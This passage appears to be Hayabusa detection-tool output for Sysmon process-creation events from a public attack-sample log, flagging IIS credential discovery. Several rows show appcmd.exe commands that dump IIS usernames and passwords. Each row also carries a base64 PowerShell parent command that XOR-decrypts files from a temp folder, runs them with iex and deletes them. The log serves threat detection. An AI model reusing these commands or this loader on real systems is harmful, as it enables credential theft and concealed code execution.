dADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 